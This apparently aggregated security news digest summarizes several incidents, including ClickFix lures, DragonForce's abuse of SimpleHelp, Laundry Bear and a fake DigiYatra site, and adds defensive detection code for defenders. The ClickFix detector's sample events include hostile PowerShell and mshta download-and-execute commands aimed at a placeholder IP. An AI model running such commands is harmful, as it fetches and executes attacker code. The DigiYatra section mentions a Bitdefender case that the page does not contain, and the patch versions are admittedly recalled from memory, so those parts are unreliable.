  • cloud.google.com: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake "AI video generator" websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • Malwarebytes: Fake AI video generator tools lure in Facebook and LinkedIn users to deliver malware
  • hackread.com: Fake AI Video Tool Ads on Facebook, LinkedIn Spread Infostealers
  • www.techradar.com: Millions of users could fall for fake Facebook ad for a text-to-AI-video tool that is just malware
  • CyberInsider: CyberInsider: Cybercriminals Use Fake AI Video Tools to Deliver Infostealers
  • The Hacker News: Reports on the use of fake installers for popular AI tools to spread ransomware and malware.
  • Metacurity: Metacurity for a concise rundown of the most critical developments you should know, including UNC6032 uses prompt-to-video AI tools to lure malware victims
  • PCMag UK security: Cybercriminals have been posting Facebook ads for fake AI video generators to distribute malware, Google's threat intelligence unit Mandiant.
  • Virus Bulletin: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake "AI video generator" websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • hackread.com: Fake ChatGPT and InVideo AI Downloads Deliver Ransomware
  • PCMag Middle East ai: Be Careful With Facebook Ads for AI Video Generators: They Could Be Malware
  • Threat Intelligence: Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites
  • ciso2ciso.com: Cybercriminals Target AI Users with Malware-Loaded Installers Posing as Popular Tools

@cyberinsider.com //
Adidas has confirmed a data breach affecting customer data via a third-party customer service provider. According to Adidas, the compromised data consists mainly of contact information for customers who had previously contacted its customer service help desk. The company states that passwords, credit card numbers and other payment-related information were not affected.

Adidas became aware that an unauthorized external party had obtained certain consumer data through a third-party customer service provider. The company says it immediately took steps to contain the incident and launched a comprehensive investigation with leading information security experts. It is currently notifying affected customers and is cooperating with data protection authorities and investigators as required by law.

This is the third publicly acknowledged incident involving the sportswear giant's customer service systems in recent months. The company is still clarifying the details, and the episode reinforces a familiar lesson: a third-party provider that holds your customer data is part of your attack surface, and its security has to be assessed and contractually required rather than assumed. Adidas says it remains fully committed to protecting the privacy and security of its consumers and sincerely regrets any inconvenience or concern caused by the incident.

Recommended read:
References :
  • cyberinsider.com: Adidas Hit by Third Customer Data Breach Linked to Support Systems
  • The Register - Security: Adidas confirms criminals stole data from customer service provider
  • The420.in: Adidas Falls Victim to Cyberattack Amid Retail Industry Wave
  • BleepingComputer: Adidas warns of data breach after customer service provider hack
  • www.it-daily.net: Data leak at Adidas: contact data tapped via third-party providers
  • bsky.app: German sportswear giant Adidas disclosed a data breach after attackers hacked a customer service provider and stole some customers' data.
  • Graham Cluley: Adidas customers’ personal information at risk after data breach
  • hackread.com: Adidas Confirms Cyber Attack, Customer Data Stolen
  • www.bleepingcomputer.com: Adidas warns of data breach after customer service provider hack
  • Graham Cluley: Adidas customers' personal information at risk after third-party data breach.
  • bsky.app: Adidas customers' personal information at risk after third-party data breach.
  • techinformed.com: Adidas becomes latest consumer brand to be hit with a cyber breach
  • www.techradar.com: Adidas confirms customer data stolen in worrying cyberattack
  • www.techdigest.tv: Adidas customer data stolen in latest retail cyber attack
  • PCMag UK security: Adidas Confirms Data Breach, Customer Contact Details Exposed
  • Rescana: April 2025 Adidas Data Breach: Supply Chain Attack via Third-Party Customer Service Provider
  • ComputerWeekly.com: Adidas confirms customer data was accessed during cyber attack

gallagherseanm@Sophos News //
DragonForce ransomware actors are actively exploiting vulnerabilities in SimpleHelp, a remote monitoring and management (RMM) tool, to target Managed Service Providers (MSPs) and their customers. Sophos MDR recently responded to an incident where a threat actor gained access to an MSP's SimpleHelp instance. The attackers then leveraged this access to deploy DragonForce ransomware across multiple endpoints and exfiltrate sensitive data, employing a double extortion tactic to pressure victims into paying a ransom. Sophos endpoint protection and MDR actions were able to thwart a ransomware and double extortion attempt on one customer’s network, highlighting the importance of robust security measures.

The attackers chained multiple vulnerabilities to gain access. Sophos MDR assesses with medium confidence that the threat actor exploited a chain of SimpleHelp vulnerabilities disclosed in January 2025: CVE-2024-57727 (multiple path traversal vulnerabilities), CVE-2024-57728 (arbitrary file upload) and CVE-2024-57726 (privilege escalation). The attackers also used their access through the MSP's RMM instance to gather information on multiple customer estates managed by the MSP, including device names and configuration, users, and network connections.

DragonForce is a ransomware-as-a-service (RaaS) operation that emerged in mid-2023. It recently drew attention for claiming to "take over" the infrastructure of RansomHub. Reports also suggest that well-known affiliates, including Scattered Spider (UNC3944), which was formerly a RansomHub affiliate, have been using DragonForce in attacks on large retail chains in the UK and the US. MSPs and their customers are advised to patch SimpleHelp instances immediately; because the MSP's instance reaches every endpoint it manages, one unpatched server is an entry point into all of its downstream customers.
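A patch-state check, as an added example that is not Sophos's or SimpleHelp's code: audit an inventory of SimpleHelp server versions against the release that fixed the three CVEs on each branch. The fixed versions used here (5.5.8, 5.4.10 and 5.3.9) are my recollection of SimpleHelp's January 2025 advisory and are not stated on this page, so confirm them against the vendor's current advisory before relying on the check; the inventory is constructed.

```python
"""
Added example, not Sophos's or SimpleHelp's own code: flag SimpleHelp servers
whose version is below the fixed release for their branch.
Fixed versions are an assumption from memory of the January 2025 advisory.
"""

# branch (major, minor) -> first version on that branch containing the fixes (assumed)
FIXED_IN = {(5, 5): (5, 5, 8), (5, 4): (5, 4, 10), (5, 3): (5, 3, 9)}


def parse_version(s):
    """'5.5.7' -> (5, 5, 7); tolerates a leading 'v' and a missing patch number."""
    parts = [int(p) for p in s.strip().lstrip("v").split(".")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_patched(version):
    """True if this version is at or above the fixed release of its branch."""
    v = parse_version(version)
    branch = v[:2]
    if branch in FIXED_IN:
        return v >= FIXED_IN[branch]
    # branches older than 5.3 received no fix; later branches (5.6+) are assumed to include it
    return branch > (5, 5)


def audit(inventory):
    """Return [(name, version)] for every server that still needs patching."""
    return [(name, ver) for name, ver in inventory if not is_patched(ver)]


INVENTORY = [  # constructed: (host label, SimpleHelp server version reported by the admin UI)
    ("msp-rmm-01", "5.5.7"),
    ("msp-rmm-02", "5.5.8"),
    ("client-a-rmm", "5.4.9"),
    ("client-b-rmm", "v5.4.10"),
    ("legacy-rmm", "5.2.3"),
    ("lab-rmm", "5.6.0"),
]

if __name__ == "__main__":
    for name, ver in audit(INVENTORY):
        print(f"{name}: SimpleHelp {ver} is below the fixed release, patch now")
```

The versions should come from your own inventory, not from a scan of the internet-facing login page alone, and for an MSP the instance that matters most is the MSP's own, since that is the one with a session into every managed endpoint.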

Recommended read:
References :
  • Sophos News: Ransomware actor exploited RMM to access multiple organizations; Sophos EDR blocked encryption on customer’s network
  • bsky.app: The DragonForce ransomware operation successfully breached a managed service provider and used its SimpleHelp remote monitoring and management (RMM) platform to steal data and deploy encryptors on downstream customers' systems.
  • securityaffairs.com: DragonForce operator chained SimpleHelp flaws to target an MSP and its customers
  • www.bleepingcomputer.com: The DragonForce ransomware operation successfully breached a managed service provider and used its SimpleHelp remote monitoring and management (RMM) platform to steal data and deploy encryptors on downstream customers' systems.
  • BleepingComputer: DragonForce ransomware abuses SimpleHelp in MSP supply chain attack
  • BleepingComputer: DragonForce ransomware operation successfully breached a managed service provider and used its SimpleHelp remote monitoring and management (RMM) platform to steal data and deploy encryptors on downstream customers' systems.
  • The Register - Security: DragonForce double-whammy: First hit an MSP, then use RMM software to push ransomware
  • www.helpnetsecurity.com: Attackers hit MSP, use its RMM software to deliver ransomware to clients
  • Help Net Security: Attackers hit MSP, use its RMM software to deliver ransomware to clients
  • www.techradar.com: DragonForce ransomware hacks SimpleHelp RMM tool to attack MSPs
  • ciso2ciso.com: DragonForce double-whammy: First hit an MSP, then use RMM software to push ransomware – Source: go.theregister.com
  • Anonymous: The ransomware operation successfully breached a managed service provider and used its SimpleHelp remote monitoring and management (RMM) platform to steal data
  • MicroScope: Sophos warns MSPs over DragonForce threat
  • Daily CyberSecurity: Details of RMM tool abused to spread DragonForce.
  • MSSP feed for Latest: DragonForce Ransomware Group Exploits MSP’s RMM Software in Attacks
  • thehackernews.com: DragonForce Exploits SimpleHelp Flaws to Deploy Ransomware Across Customer Endpoints
  • Tech Monitor: DragonForce exploits SimpleHelp in MSP breach
  • www.bleepingcomputer.com: DragonForce ransomware abuses SimpleHelp in MSP supply chain attack

@www.helpnetsecurity.com //
A newly identified Russian cyber-espionage group, known as Laundry Bear by Dutch intelligence and Void Blizzard by Microsoft, has been actively targeting Western organizations since at least April 2024. This group is believed to be backed by the Russian government and is primarily focused on gathering intelligence to support Russian strategic interests. Laundry Bear's targets include government entities, defense contractors, aerospace firms, and high-tech businesses in Europe and North America, particularly those supporting Ukraine. The group's activities suggest an interest in sensitive information related to military goods, weapons deliveries, and advanced technologies that are difficult for Russia to acquire due to Western sanctions.

The primary objective of Laundry Bear is to steal sensitive emails and files from compromised systems. It does this by targeting cloud-hosted email environments, specifically Microsoft Exchange Online. The group's techniques are not novel: pass-the-cookie attacks (replaying a stolen, already-authenticated session cookie, which sidesteps the password and any MFA prompt that protected the original login), password spraying, and spear phishing aimed at credential theft. Notably, the Dutch intelligence services identified Laundry Bear during an investigation into a credential-stealing attack against the Dutch National Police in September 2024. In that attack the group used a stolen session cookie to access an account belonging to a police employee and obtained work-related contact information for other police employees.

Microsoft has also observed Laundry Bear targeting critical sectors such as government, defense, transportation, media, NGOs and healthcare, with a focus on organizations in Europe, North America, NATO member states and Ukraine. The group frequently gains initial access with stolen credentials, likely purchased from online marketplaces. Despite relatively simple methods and readily available tools, Laundry Bear has achieved a high success rate through fast-paced operations and efficient automation. Microsoft's recommendations centre on identity hardening, in particular multi-factor authentication and conditional access, together with monitoring for the spray and session-replay patterns described above.
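Two of the techniques above lend themselves to simple detections over sign-in telemetry. The following is an added example, not code from Microsoft, the AIVD/MIVD or this page; it runs over constructed sign-in events with assumed field names (ts, user, ip, result, session_id) and assumed thresholds, and flags (1) password spraying, one source IP failing against many distinct accounts in a short window, and (2) pass-the-cookie, one session identifier presented successfully from two different source IPs.

```python
"""
Added example, not Microsoft's or the Dutch services' code: spray and
session-replay detection over constructed cloud sign-in events.
"""
from collections import defaultdict
from datetime import datetime, timedelta

EVENTS = [  # constructed sample, not real telemetry
    {"ts": "2024-09-10T08:00:01", "user": "alice@police.example", "ip": "203.0.113.7",   "result": "failure", "session_id": None},
    {"ts": "2024-09-10T08:00:05", "user": "bob@police.example",   "ip": "203.0.113.7",   "result": "failure", "session_id": None},
    {"ts": "2024-09-10T08:00:09", "user": "carol@police.example", "ip": "203.0.113.7",   "result": "failure", "session_id": None},
    {"ts": "2024-09-10T08:00:14", "user": "dave@police.example",  "ip": "203.0.113.7",   "result": "failure", "session_id": None},
    {"ts": "2024-09-10T08:00:18", "user": "erin@police.example",  "ip": "203.0.113.7",   "result": "failure", "session_id": None},
    {"ts": "2024-09-10T08:03:30", "user": "frank@police.example", "ip": "198.51.100.20", "result": "failure", "session_id": None},
    {"ts": "2024-09-10T08:04:00", "user": "frank@police.example", "ip": "198.51.100.20", "result": "success", "session_id": "sess-4f1e"},
    {"ts": "2024-09-10T08:41:12", "user": "frank@police.example", "ip": "203.0.113.9",   "result": "success", "session_id": "sess-4f1e"},
    {"ts": "2024-09-10T09:00:00", "user": "grace@police.example", "ip": "198.51.100.33", "result": "success", "session_id": "sess-9a02"},
]


def detect_password_spray(events, window=timedelta(minutes=10), min_users=5):
    """Map source IP -> sorted distinct accounts it failed against, for IPs
    that hit at least `min_users` distinct accounts inside `window`."""
    failures = defaultdict(list)
    for e in events:
        if e["result"] == "failure":
            failures[e["ip"]].append((datetime.fromisoformat(e["ts"]), e["user"]))
    hits = {}
    for ip, fails in failures.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):          # sliding window over this IP's failures
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits


def detect_cookie_replay(events):
    """Map session_id -> sorted source IPs, for sessions presented
    successfully from more than one IP (stolen cookie replayed elsewhere)."""
    ips = defaultdict(set)
    for e in events:
        if e["session_id"] and e["result"] == "success":
            ips[e["session_id"]].add(e["ip"])
    return {sid: sorted(v) for sid, v in ips.items() if len(v) > 1}


if __name__ == "__main__":
    for ip, users in detect_password_spray(EVENTS).items():
        print(f"spray from {ip}: {len(users)} accounts targeted")
    for sid, addrs in detect_cookie_replay(EVENTS).items():
        print(f"session {sid} replayed from {addrs}")
```

The replay rule needs enrichment before it becomes an alert (a user moving between home Wi-Fi and mobile data also changes IP), so correlate with ASN, device identity and the time gap. The durable fix is not MFA alone, which the stolen cookie already satisfied, but short-lived sessions and tokens bound to the device that obtained them.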

Recommended read:
References :
  • The Hacker News: Microsoft has shed light on a previously undocumented cluster of malicious activity originating from a Russia-affiliated threat actor dubbed Void Blizzard (aka Laundry Bear) that it said is attributed to worldwide cloud abuse.
  • www.helpnetsecurity.com: Microsoft, Dutch security agencies lift veil on Laundry Bear cyber espionage group
  • Threats | CyberScoop: New Russian state-sponsored APT quickly gains global reach, hitting expansive targets
  • therecord.media: Recent attacks on institutions in the Netherlands were the work of a previously unknown Russian hacking group that Dutch intelligence agencies are labeling Laundry Bear. Microsoft also reported on the group, naming it Void Blizzard.
  • www.microsoft.com: Microsoft Threat Intelligence has discovered a cluster of worldwide cloud abuse activity conducted by a threat actor we track as Void Blizzard, who we assess with high confidence is Russia-affiliated and has been active since at least April 2024.
  • www.defensie.nl: Onbekende Russische groep achter hacks Nederlandse doelen - Unknown Russian group behind hacks of Dutch targets - "is behind the hacks on several Dutch organizations, including the police in September 2024.
  • Help Net Security: Microsoft, Dutch security agencies lift veil on Laundry Bear cyber espionage group
  • thecyberexpress.com: New Russian Cyber Threat ‘Laundry Bear’ Hits Western Targets
  • www.csoonline.com: New Russian APT group Void Blizzard targets NATO-based orgs after infiltrating Dutch police
  • The Register - Security: New Russian cyber-spy crew Laundry Bear joins the email-stealing pack
  • securityonline.info: Void Blizzard: New Russian Cyberespionage Group Targets NATO and Ukraine
  • securityonline.info: Void Blizzard: New Russian Cyberespionage Group Targets NATO and Ukraine
  • securityaffairs.com: Russia-linked APT Laundry Bear linked to 2024 Dutch Police attack
  • industrialcyber.co: Microsoft details Void Blizzard as Russian cyber threat targeting global critical infrastructure
  • Virus Bulletin: Microsoft Threat Intelligence, in collaboration with Dutch security organizations AIVD & MIVD, observed Void Blizzard (a.k.a. LAUNDRY BEAR) conducting espionage operations primarily targeting organizations that are important to Russian government objectives.
  • Industrial Cyber: Microsoft details Void Blizzard as Russian cyber threat targeting global critical infrastructure
  • www.cybersecuritydive.com: Microsoft, Dutch government spot new Russian hacking group targeting critical infrastructure
  • Metacurity: Russian group Laundry Bear hacked Dutch police, targets Ukraine-allied nations
  • www.metacurity.com: Russian group Laundry Bear hacked Dutch police, targets Ukraine-allied nations
  • Vulnerable U: Void Blizzard hackers raid NATO cloud tenants with Evilginx phishing
  • Danny Palmer: A new Russian APT (LAUNDRY BEAR) is tearing through defence and government entities in NATO member states using stripped back and heavily automated threat techniques that nonetheless went widely undetected until they were spotted by the Dutch police, the Netherlands’s security services revealed.

@therecord.media //
MathWorks, the company behind the popular MATLAB software used by over five million people worldwide, has confirmed a ransomware attack that began on May 18, 2025. The attack disrupted online applications and internal systems, impacting licensing and access for users globally. The company has notified federal law enforcement and is working with cybersecurity experts to restore affected systems.

Commercial customers and STEM students have been significantly impacted by the prolonged outage. An IT manager at an engineering firm reported difficulties acquiring new licenses, hindering ongoing projects. Students also faced challenges, particularly with assessment tools like MATLAB Grader and Cody, which were only recently partially restored. Some frustrated users admitted to pirating the software due to the lack of access to the services they had paid for.

MathWorks has been issuing updates on its status page, initially citing technical issues before confirming the ransomware attack on May 26. While many systems are being brought back online, full recovery is still underway. The company has not yet disclosed details about the ransomware group responsible, whether a ransom was paid, or if data was exfiltrated.

Recommended read:
References :
  • The Dysruption Hub: MathWorks confirms ransomware attack disrupted MATLAB services starting May 18, impacting licensing and access for users worldwide.
  • The Register - Software: Commercial customers, STEM students all feeling the pain after mega outage of engineering data-analysis tool. Software biz MathWorks is cleaning up a ransomware attack more than a week after it took down MATLAB, its flagship product used by more than five million people worldwide.
  • therecord.media: MathWorks — developer of MATLAB — has updated customers after initially reporting outages on May 18, confirming a ransomware attack that took down online applications and internal systems used by staff.
  • The Record: MathWorks — developer of MATLAB — has updated customers after initially reporting outages on May 18, confirming a ransomware attack that took down online applications and internal systems used by staff.
  • securebulletin.com: When the world’s engineers, scientists, and students logged in to MATLAB on May 18, 2025, many were met with silence—a digital void where powerful tools once lived.
  • bsky.app: MathWorks, a leading developer of mathematical computing and simulation software, has revealed that a recent ransomware attack is behind an ongoing service outage.
  • www.bleepingcomputer.com: MathWorks Blames Ransomware Attack for Ongoing Outages - BleepingComputer
  • BleepingComputer: MathWorks, a leading developer of mathematical computing and simulation software, has revealed that a recent ransomware attack is behind an ongoing service outage.
  • Doug Levin: Doug Levin: MathWorks experienced a ransomware attack.
  • Secure Bulletin: Ransomware attack in MathWorks outage that paralyzed MATLAB
  • DataBreaches.Net: MathWorks, Creator of MATLAB, Confirms Ransomware Attack
  • Blog: Confirmed: MathWorks outage due to ransomware attack

Puja Srivastava@Sucuri Blog //
Cybercriminals are increasingly employing sophisticated social engineering techniques to distribute malware, with a recent surge in attacks leveraging fake CAPTCHA prompts and AI-generated TikTok videos. These campaigns, collectively known as "ClickFix," manipulate users into executing malicious PowerShell commands, leading to system compromise and the installation of information-stealing malware. A notable example involves a fake Google Meet page hosted on compromised WordPress sites, which tricks visitors into copying and pasting a specific PowerShell command under the guise of fixing a "Microphone Permission Denied" error. Once executed, the command downloads a remote access trojan (RAT), granting attackers full control over the victim's system.

The ClickFix technique is also being amplified through AI-generated TikTok videos that promise free access to premium software like Windows, Microsoft Office, Spotify, and CapCut. These videos instruct users to run PowerShell scripts, which instead install Vidar and StealC malware, capable of stealing login credentials, credit card data, and 2FA codes. Trend Micro researchers note that the use of AI allows for rapid production and tailoring of these videos to target different user segments. These tactics have proven highly effective, with one video promising to "boost your Spotify experience instantly" amassing nearly 500,000 views.

Detecting and preventing ClickFix attacks requires a multi-faceted approach. Security experts recommend disabling the Run dialog (the Windows + R hotkey) through Group Policy for users who do not need it, though this only removes one paste target; the same lure works in a PowerShell or Terminal window. Users should be suspicious of any unsolicited instruction to copy and paste a command, verify the legitimacy of video sources, and never run PowerShell commands from untrusted sources. On the detection side, monitoring process creation events for the lure text attackers append to the command ("not a robot", "captcha", "secure code", "human") is effective because the victim pastes that text along with the payload; combining it with process lineage (an interpreter spawned by explorer.exe) and download-and-execute patterns in the command line reduces false positives. These measures, combined with user awareness, are what mitigates the growing ClickFix threat.
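The process-creation triage rule above, as an added example that is not code from Sucuri, Trend Micro or this page: it scores constructed events shaped like Sysmon Event ID 1 (parent image, image, command line) on four independent signals. The keyword list extends the page's by one term ("verification"), and the threshold, the interpreter list and the regexes are my assumptions.

```python
"""
Added example, not Sucuri's or Trend Micro's code: ClickFix triage over
constructed process-creation events.
"""
import re

EVENTS = [  # constructed sample events, not real telemetry
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://203.0.113.55/verify.txt | iex" # I am not a robot - reCAPTCHA Verification ID: 7811'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://203.0.113.55/fix-microphone-permission  # Secure Code: 41B2"},
    {"parent": r"C:\Program Files\Vendor\Agent\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Vendor\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c dir C:\Users\alice\Documents"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
LURE_KEYWORDS = ("not a robot", "captcha", "secure code", "human", "verification")
DOWNLOAD_EXEC = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|iex|invoke-expression|downloadstring|downloadfile)\b"
    r"|\bmshta(?:\.exe)?\s+https?://", re.I)
HIDDEN_OR_ENCODED = re.compile(
    r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b|(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons); each independent ClickFix signal adds one point."""
    reasons = []
    if basename(ev["image"]) not in INTERPRETERS:
        return 0, reasons
    cmd = ev["cmdline"]
    if basename(ev["parent"]) == "explorer.exe":
        reasons.append("interpreter spawned by explorer.exe (Run dialog / shell)")
    found = [k for k in LURE_KEYWORDS if k in cmd.lower()]
    if found:
        reasons.append("lure text in command line: " + ", ".join(found))
    if DOWNLOAD_EXEC.search(cmd):
        reasons.append("download-and-execute primitive")
    if HIDDEN_OR_ENCODED.search(cmd):
        reasons.append("hidden window or encoded command")
    return len(reasons), reasons


def find_clickfix(events, threshold=2):
    """Events scoring at least `threshold`, as (cmdline, reasons)."""
    out = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            out.append((ev["cmdline"], reasons))
    return out


if __name__ == "__main__":
    for cmdline, reasons in find_clickfix(EVENTS):
        print(cmdline[:70], "->", "; ".join(reasons))
```

The vendor inventory script and the plain `cmd /c dir` stay below the threshold, while both lures score on several signals at once. For host forensics after the fact, commands typed into the Run dialog are also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is a quick way to confirm that a user actually pasted the command.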

Recommended read:
References :
  • Sucuri Blog: Fake Google Meet Page Tricks Users into Running PowerShell Malware
  • securityonline.info: Fake Google Meet Page Tricks Users into Running Malware
  • gbhackers.com: How Google Meet Pages Are Exploited to Deliver PowerShell Malware
  • securityaffairs.com: Crooks use TikTok videos with fake tips to trick users into running commands that install Vidar and StealC malware in ClickFix attacks.
  • securityonline.info: Threat actors have ramped up a new social engineering campaign, dubbed "ClickFix," where fake CAPTCHA prompts embedded in
  • Know Your Adversary: I think you at least heard about fake CAPTCHA attacks. Yes, ClickFix again. The thing is - adversaries use fake CAPTCHA pages to trick users into executing malicious commands in Windows.

@cyble.com //
Nova Scotia Power has confirmed that the cyber incident it first disclosed nearly a month ago was a ransomware attack, and that it has not paid the ransom. The attack affects approximately 280,000 customers: the attackers gained unauthorized access to internal systems, encrypted critical systems and exfiltrated customer data.

Nova Scotia Power engaged third-party cybersecurity firms to isolate affected networks, contain the damage and conduct forensic analysis. The company says the attackers bypassed existing safeguards, but it has not disclosed the ransomware variant or the initial entry vector. It attributes its refusal to pay to sanctions law and to coordination with law enforcement agencies.

The threat actor publicly released portions of the stolen data, compelling Nova Scotia Power to initiate a large-scale notification campaign. Impacted customers received physical mail detailing the breach’s scope and remediation steps. The compromised information reportedly includes names, addresses, account numbers, and potentially payment histories. To address identity theft risks, Nova Scotia Power partnered with TransUnion to offer affected individuals a two-year subscription to the myTrueIdentity® credit monitoring service at no cost, including real-time credit alerts and dark web surveillance.

Recommended read:
References :
  • thecyberexpress.com: Nova Scotia Power has confirmed it was the victim of a ransomware attack, weeks after initially alerting customers to a cybersecurity breach.
  • Tech Monitor: Nova Scotia Power confirms data breach, customer information compromised
  • cyberpress.org: Nova Scotia Power Confirms Cyberattack Affecting 280K Customers
  • securityaffairs.com: Nova Scotia Power confirms it was hit by a ransomware attack but hasn’t paid the ransom, nearly a month after first disclosing the cyberattack.
  • Cyber Security News: Nova Scotia Power, a key utility provider, faced a significant ransomware attack, which led to the leak of customer data and exposed sensitive information.

@securityonline.info //
A critical security vulnerability has been reported in vBulletin forum software, tracked as CVE-2024-45721, that allows unauthenticated attackers to execute arbitrary code on unpatched systems, putting the online communities that run it at risk of full server compromise. The vulnerability is said to affect vBulletin versions 6.0.0 through 6.1.4 and to stem from improper sanitization of user input in the template rendering modules. Reported by cybersecurity firm SentinelWatch on May 22, 2025, the flaw has already drawn significant exploitation activity, with over 12,000 exploitation attempts against forums in various sectors within 48 hours of public disclosure.

Exploitation of the vulnerability involves crafting malicious forum posts containing payloads that bypass built-in sandboxing through parameter smuggling techniques. Attackers leverage vBulletin’s `vb:rawtemplate` directive, which fails to properly validate nested function calls when processing user-generated content. Successful exploitation grants SYSTEM-level privileges on Windows hosts and www-data access on Linux systems, enabling the installation of web shells, credential harvesters, and cryptocurrency miners. Proof-of-concept exploits have demonstrated the ability to execute OS commands even when PHP security hardening measures are present, by using PHP's `unserialize()` function with crafted OPcache configurations to bypass `disable_functions` restrictions.

In response to the widespread exploitation, vBulletin released patch 6.1.5 on May 25, 2025, which introduces granular template validation. However, as of the latest reports, 68% of installations remain unupdated, leaving a significant number of forums vulnerable. Observed attack clusters include cryptojacking campaigns, data exfiltration, and precursors to ransomware attacks. Notably, 58% of compromised forums had hidden Monero miners installed, while attackers cloned user databases from 23 gaming communities containing 14 million records, now circulating on dark web markets. Additionally, six enterprise forums received tailored malware potentially leading to Black Basta ransomware deployment.

Recommended read:
References :
  • cyberpress.org: Severe vBulletin Forum Flaw Enables Remote Code Execution
  • securityonline.info: Critical Pre-Auth RCE: vBulletin Flaw Allows Full Server Compromise (PoC Available)
  • infosec.exchange: A newly discovered vulnerability in vBulletin, one of the world’s most popular forum platforms, has exposed thousands of online communities to the risk of unauthenticated Remote Code Execution
  • Cyber Security News: Severe vBulletin Forum Flaw Enables Remote Code Execution

MalBot@malware.news //
A fraudulent website, digiyatra[.]in, is actively targeting Indian air travelers by impersonating the official DigiYatra Foundation. Threat actors are exploiting the trust placed in India's digital infrastructure by setting up this deceptive phishing site. The website, which remains live at the time of reporting, is designed to harvest personal user data under the guise of providing official services for air travelers, mirroring a legitimate flight booking portal with a flight search box and user forms requesting names, phone numbers, and email addresses.

Despite the appearance of a genuine booking platform, the website does not facilitate any actual ticket sales or transactions. Its sole purpose is data harvesting: it imitates a legitimate service experience to entice users into entering Personally Identifiable Information (PII). The site uses a free Let's Encrypt TLS certificate, so browsers show the padlock and users read it as a sign of legitimacy; in fact the padlock only attests that the connection is encrypted to whoever controls the domain, and says nothing about who that is. The domain was registered under the name Ali Sajil from Kerala, India, and is reachable both by name and by IP address (167[.]172[.]151[.]164).

The discovery of this phishing site poses significant risks, including unauthorized data collection, public deception, and potential reputational damage to the DigiYatra initiative. The site's ability to deceive users stems from its strategic use of keywords and the appearance of security through HTTPS. In response to this threat, ThreatWatch360 has taken immediate action, escalating the matter to CERT-In and submitting a takedown request to the domain registrar. Furthermore, alerts have been shared with brand protection clients, and monitoring for similar fraudulent attempts is ongoing, with DNS-level blocks advised for the domain and its IP address to prevent further abuse.
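Both the fake Bitdefender download site (bitdefender-download[.]com, above) and the fake DigiYatra portal follow the same pattern: a registrable domain that contains or closely resembles the brand but is not one the brand owns. The following is an added example, not code from DomainTools, ThreatWatch360, Bitdefender or this page, that classifies a defanged domain or URL as legitimate, brand lookalike or unrelated. The OFFICIAL allowlist is an assumption a defender maintains (the DigiYatra entry in particular must be checked against the real official domain), MULTI_LABEL_SUFFIXES is a tiny stand-in for the public suffix list, and the edit-distance threshold is a guess.

```python
"""
Added example, not DomainTools' or ThreatWatch360's code: brand-lookalike
domain classification for the two impersonation cases on this page.
"""
from urllib.parse import urlsplit

OFFICIAL = {  # assumed allowlist: brand -> registrable domains the brand really uses
    "bitdefender": {"bitdefender.com"},
    "digiyatra": {"digiyatra.gov.in"},   # assumption, verify against the official site
}
MULTI_LABEL_SUFFIXES = {"gov.in", "co.in", "co.uk", "com.au", "co.jp"}  # toy subset of the PSL


def refang(s):
    """Undo report defanging: bitdefender-download[.]com -> bitdefender-download.com"""
    return s.strip().replace("[.]", ".").replace("hxxp", "http")


def hostname(candidate):
    s = refang(candidate)
    if "://" not in s:
        s = "//" + s                      # makes urlsplit treat the text as a network location
    host = urlsplit(s).hostname
    if not host:
        raise ValueError(f"no hostname in {candidate!r}")
    return host.rstrip(".")


def registrable_domain(host):
    """eTLD+1 with the toy suffix table: www.bitdefender.com -> bitdefender.com"""
    labels = host.split(".")
    n = 3 if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 2
    return ".".join(labels[-n:])


def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(candidate, max_edits=2):
    """Return ('legitimate' | 'lookalike' | 'unrelated', brand or None)."""
    host = hostname(candidate)
    reg = registrable_domain(host)
    for brand, domains in OFFICIAL.items():
        if reg in domains:
            return "legitimate", brand
    # tokens: every DNS label of the full host plus hyphen-separated pieces,
    # so bitdefender-download.com and bitdefender.com.evil.example both surface
    tokens = set()
    for label in host.split("."):
        tokens.add(label)
        tokens.update(label.split("-"))
    for brand in OFFICIAL:
        if any(brand in t or levenshtein(t, brand) <= max_edits for t in tokens):
            return "lookalike", brand
    return "unrelated", None


if __name__ == "__main__":
    for c in ("bitdefender-download[.]com", "https://www.bitdefender.com/downloads",
              "digiyatra[.]in", "bitdefemder.com", "example.org"):
        print(f"{c:45} -> {classify(c)}")
```

The same check applies to the final host of a download's redirect chain: the fake Bitdefender site handed users a Bitbucket link that redirected to an S3 bucket, and a vendor installer arriving from a host that classifies as anything other than the vendor's own domain is a red flag regardless of the file name. A real Bitdefender installer is also code-signed by Bitdefender, so checking the signer is a stronger test than trusting "BitDefender.zip".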

Recommended read:
References :
